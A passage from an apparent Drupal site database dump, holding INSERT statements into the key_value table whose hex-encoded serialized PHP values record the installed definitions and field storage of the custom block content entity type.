3b733a383a2270726f7669646572223b693a353b733a363a22706c7567696e223b693a363b733a383a2273657474696e6773223b693a373b733a31303a227669736962696c697479223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d),
('entity.definitions.installed', 'block_content.entity_type', 0x4f3a33363a2244727570616c5c436f72655c456e746974795c436f6e74656e74456e7469747954797065223a34313a7b733a353a22002a006964223b733a31333a22626c6f636b5f636f6e74656e74223b733a383a22002a00636c617373223b733a34303a2244727570616c5c626c6f636b5f636f6e74656e745c456e746974795c426c6f636b436f6e74656e74223b733a31313a22002a0070726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a31353a22002a007374617469635f6361636865223b623a313b733a31353a22002a0072656e6465725f6361636865223b623a303b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a393a7b733a323a226964223b733a323a226964223b733a383a227265766973696f6e223b733a31313a227265766973696f6e5f6964223b733a363a2262756e646c65223b733a343a2274797065223b733a353a226c6162656c223b733a343a22696e666f223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a343a2275756964223b733a343a2275756964223b733a393a227075626c6973686564223b733a363a22737461747573223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b7d733a31363a22002a006f726967696e616c436c617373223b733a34303a2244727570616c5c626c6f636b5f636f6e74656e745c456e746974795c426c6f636b436f6e74656e74223b733a31313a22002a0068616e646c657273223b613a383a7b733a373a2273746f72616765223b733a34363a2244727570616c5c436f72655c456e746974795c53716c5c53716c436f6e74656e74456e7469747953746f72616765223b733a363a22616363657373223b733a35333a2244727570616c5c626c6f636b5f636f6e74656e745c426c6f636b436f6e74656e74416363657373436f6e74726f6c48616e646c6572223b733a31323a226c6973745f6275696c646572223b733a34343a2244727570616c5c626c6f636b5f636f6e74656e745c426c6f636b436f6e74656e744c6973744275696c646572223b733a31323a22766965775f6275696c646572223b733a34343a2244727570616c5c626c6f636b5f636f6e74656e745c426c6f636b436f6e74656e74566965774275696c646572223b733a31303a2276696577735f64617461223b733a34323a2244727570616c5c626c6f636b5f636f6e74656e745c426c6f636b436f6e74656e74566965777344617461223b733a343a22666f726d223b613a363a7b733a333a22616464223b733a33373a2244727570616c5c626c6f636b5f636f6e74656e745c426c6f636b436f6e74656e74466f726d223b733a343a2265646974223b733a33373a2244727570616c5c626c6f636b5f636f6e74656e745c426c6f636b436f6e74656e74466f726d223b733a363a2264656c657465223b733a34383a2244727570616c5c626c6f636b5f636f6e74656e745c466f726d5c426c6f636b436f6e74656e7444656c657465466f726d223b733a373a2264656661756c74223b733a33373a2244727570616c5c626c6f636b5f636f6e74656e745c426c6f636b436f6e74656e74466f726d223b733a31353a227265766973696f6e2d64656c657465223b733a34323a2244727570616c5c436f72655c456e746974795c466f726d5c5265766973696f6e44656c657465466f726d223b733a31353a227265766973696f6e2d726576657274223b733a34323a2244727570616c5c436f72655c456e746974795c466f726d5c5265766973696f6e526576657274466f726d223b7d733a31313a227472616e736c6174696f6e223b733a35313a2244727570616c5c626c6f636b5f636f6e74656e745c426c6f636b436f6e74656e745472616e736c6174696f6e48616e646c6572223b733a31343a2273746f726167655f736368656d61223b733a34363a2244727570616c5c626c6f636b5f636f6e74656e745c426c6f636b436f6e74656e7453746f72616765536368656d61223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a31373a2261646d696e697374657220626c6f636b73223b733a32343a22002a00636f6c6c656374696f6e5f7065726d697373696f6e223b4e3b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a383a7b733a393a2263616e6f6e6963616c223b733a32323a222f626c6f636b2f7b626c6f636b5f636f6e74656e747d223b733a31313a2264656c6574652d666f726d223b733a32393a222f626c6f636b2f7b626c6f636b5f636f6e74656e747d2f64656c657465223b733a393a22656469742d666f726d223b733a32323a222f626c6f636b2f7b626c6f636b5f636f6e74656e747d223b733a31303a22636f6c6c656374696f6e223b733a33363a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e74223b733a363a22637265617465223b733a363a222f626c6f636b223b733a32303a227265766973696f6e2d64656c6574652d666f726d223b733a37373a222f61646d696e2f636f6e74656e742f626c6f636b2f7b626c6f636b5f636f6e74656e747d2f7265766973696f6e2f7b626c6f636b5f636f6e74656e745f7265766973696f6e7d2f64656c657465223b733a32303a227265766973696f6e2d7265766572742d666f726d223b733a37373a222f61646d696e2f636f6e74656e742f626c6f636b2f7b626c6f636b5f636f6e74656e747d2f7265766973696f6e2f7b626c6f636b5f636f6e74656e745f7265766973696f6e7d2f726576657274223b733a31353a2276657273696f6e2d686973746f7279223b733a34363a222f61646d696e2f636f6e74656e742f626c6f636b2f7b626c6f636b5f636f6e74656e747d2f7265766973696f6e73223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31373a22437573746f6d20626c6f636b2074797065223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31333a22002a00626173655f7461626c65223b733a31333a22626c6f636b5f636f6e74656e74223b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b733a32383a22626c6f636b5f636f6e74656e745f6669656c645f7265766973696f6e223b733a31373a22002a007265766973696f6e5f7461626c65223b733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b733a31333a22002a00646174615f7461626c65223b733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a313b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a313b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22437573746f6d20626c6f636b223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22437573746f6d20626c6f636b73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22637573746f6d20626c6f636b223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22637573746f6d20626c6f636b73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31393a2240636f756e7420637573746f6d20626c6f636b223b733a363a22706c7572616c223b733a32303a2240636f756e7420637573746f6d20626c6f636b73223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a373a22636f6e74656e74223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a22436f6e74656e74223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b733a33353a22656e746974792e626c6f636b5f636f6e74656e745f747970652e656469745f666f726d223b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a323a7b733a32363a22456e74697479556e7472616e736c617461626c654669656c6473223b4e3b733a32353a22426c6f636b436f6e74656e74456e746974794368616e676564223b4e3b7d733a31333a22002a006164646974696f6e616c223b613a313a7b733a31343a22726f7574655f70726f7669646572223b613a313a7b733a383a227265766973696f6e223b733a35323a2244727570616c5c436f72655c456e746974795c526f7574696e675c5265766973696f6e48746d6c526f75746550726f7669646572223b7d7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a32353a22002a007265766973696f6e5f6d657461646174615f6b657973223b613a343a7b733a31333a227265766973696f6e5f75736572223b733a31333a227265766973696f6e5f75736572223b733a31363a227265766973696f6e5f63726561746564223b733a31363a227265766973696f6e5f63726561746564223b733a32303a227265766973696f6e5f6c6f675f6d657373616765223b733a31323a227265766973696f6e5f6c6f67223b733a31363a227265766973696f6e5f64656661756c74223b733a31363a227265766973696f6e5f64656661756c74223b7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.definitions.installed', 'block_content.field_storage_definitions', 0x613a32303a7b733a323a226964223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31353a22437573746f6d20626c6f636b204944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a22726561642d6f6e6c79223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32303a2254686520637573746f6d20626c6f636b2049442e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a31303a226669656c645f6e616d65223b733a323a226964223b733a31313a22656e746974795f74797065223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a696e7465676572223b733a383a2273657474696e6773223b613a363a7b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a333a226d696e223b733a303a22223b733a333a226d6178223b733a303a22223b733a363a22707265666978223b733a303a22223b733a363a22737566666978223b733a303a22223b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a323b7d733a373a22002a0074797065223b733a373a22696e7465676572223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a343a2275756964223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a2255554944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a22726561642d6f6e6c79223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32323a2254686520637573746f6d20626c6f636b20555549442e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a31303a226669656c645f6e616d65223b733a343a2275756964223b733a31313a22656e746974795f74797065223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31353a226669656c645f6974656d3a75756964223b733a383a2273657474696e6773223b613a333a7b733a31303a226d61785f6c656e677468223b693a3132383b733a383a2269735f6173636969223b623a313b733a31343a22636173655f73656e736974697665223b623a303b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a34303b7d733a373a22002a0074797065223b733a343a2275756964223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a353a2276616c7565223b613a313a7b693a303b733a353a2276616c7565223b7d7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31313a227265766973696f6e5f6964223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a225265766973696f6e204944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a22726561642d6f6e6c79223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a22546865207265766973696f6e2049442e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a31303a226669656c645f6e616d65223b733a31313a227265766973696f6e5f6964223b733a31313a22656e746974795f74797065223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a696e7465676572223b733a383a2273657474696e6773223b613a363a7b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a333a226d696e223b733a303a22223b733a333a226d6178223b733a303a22223b733a363a22707265666978223b733a303a22223b733a363a22737566666978223b733a303a22223b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a37373b7d733a373a22002a0074797065223b733a373a22696e7465676572223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a383a226c616e67636f6465223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a31303a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a224c616e6775616765223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a373a22646973706c6179223b613a323a7b733a343a2276696577223b613a313a7b733a373a226f7074696f6e73223b613a313a7b733a363a22726567696f6e223b733a363a2268696464656e223b7d7d733a343a22666f726d223b613a313a7b733a373a226f7074696f6e73223b613a323a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b7d7d7d733a31323a227265766973696f6e61626c65223b623a313b733a31323a227472616e736c617461626c65223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33313a2254686520637573746f6d20626c6f636b206c616e677561676520636f64652e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a31303a226669656c645f6e616d65223b733a383a226c616e67636f6465223b733a31313a22656e746974795f74797065223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31393a226669656c645f6974656d3a6c616e6775616765223b733a383a2273657474696e6773223b613a303a7b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3131353b7d733a373a22002a0074797065223b733a383a226c616e6775616765223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a343a2274797065223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a393a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31303a22426c6f636b2074797065223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a227265717569726564223b623a313b733a393a22726561642d6f6e6c79223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31353a2254686520626c6f636b20747970652e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a31303a226669656c645f6e616d65223b733a343a2274797065223b733a31313a22656e746974795f74797065223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a32373a226669656c645f6974656d3a656e746974795f7265666572656e6365223b733a383a2273657474696e6773223b613a333a7b733a31313a227461726765745f74797065223b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3135353b7d733a373a22002a0074797065223b733a31363a22656e746974795f7265666572656e6365223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a393a227461726765745f6964223b613a333a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b7d7d733a373a22696e6465786573223b613a313a7b733a393a227461726765745f6964223b613a313a7b693a303b733a393a227461726765745f6964223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31363a227265766973696f6e5f63726561746564223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32303a225265766973696f6e206372656174652074696d65223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34373a225468652074696d652074686174207468652063757272656e74207265766973696f6e2077617320637265617465642e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31323a227265766973696f6e61626c65223b623a313b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a31303a226669656c645f6e616d65223b733a31363a227265766973696f6e5f63726561746564223b733a31313a22656e746974795f74797065223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a63726561746564223b733a383a2273657474696e6773223b613a303a7b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3139333b7d733a373a22002a0074797065223b733a373a2263726561746564223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a313a7b733a343a2274797065223b733a333a22696e74223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31333a227265766973696f6e5f75736572223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a225265766973696f6e2075736572223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35303a225468652075736572204944206f662074686520617574686f72206f66207468652063757272656e74207265766973696f6e2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31323a227265766973696f6e61626c65223b623a313b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a31303a226669656c645f6e616d65223b733a31333a227265766973696f6e5f75736572223b733a31313a22656e746974795f74797065223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a32373a226669656c645f6974656d3a656e746974795f7265666572656e6365223b733a383a2273657474696e6773223b613a333a7b733a31313a227461726765745f74797065223b733a343a2275736572223b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3232333b7d733a373a22002a0074797065223b733a31363a22656e746974795f7265666572656e6365223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a393a227461726765745f6964223b613a333a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a393a227461726765745f6964223b613a313a7b693a303b733a393a227461726765745f6964223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31323a227265766973696f6e5f6c6f67223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a31303a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32303a225265766973696f6e206c6f67206d657373616765223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35343a22546865206c6f6720656e747279206578706c61696e696e6720746865206368616e67657320696e2074686973207265766973696f6e2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31323a227265766973696f6e61626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b733a303a22223b7d7d733a373a22646973706c6179223b613a313a7b733a343a22666f726d223b613a313a7b733a373a226f7074696f6e73223b613a333a7b733a343a2274797065223b733a31353a22737472696e675f7465787461726561223b733a363a22776569676874223b693a32353b733a383a2273657474696e6773223b613a313a7b733a343a22726f7773223b693a343b7d7d7d7d733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a31303a226669656c645f6e616d65223b733a31323a227265766973696f6e5f6c6f67223b733a31313a22656e746974795f74797065223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a32323a226669656c645f6974656d3a737472696e675f6c6f6e67223b733a383a2273657474696e6773223b613a313a7b733a31343a22636173655f73656e736974697665223b623a303b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3236303b7d733a373a22002a0074797065223b733a31313a22737472696e675f6c6f6e67223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a363a22737461747573223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a393a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a393a225075626c6973686564223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31323a227265766973696f6e61626c65223b623a313b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a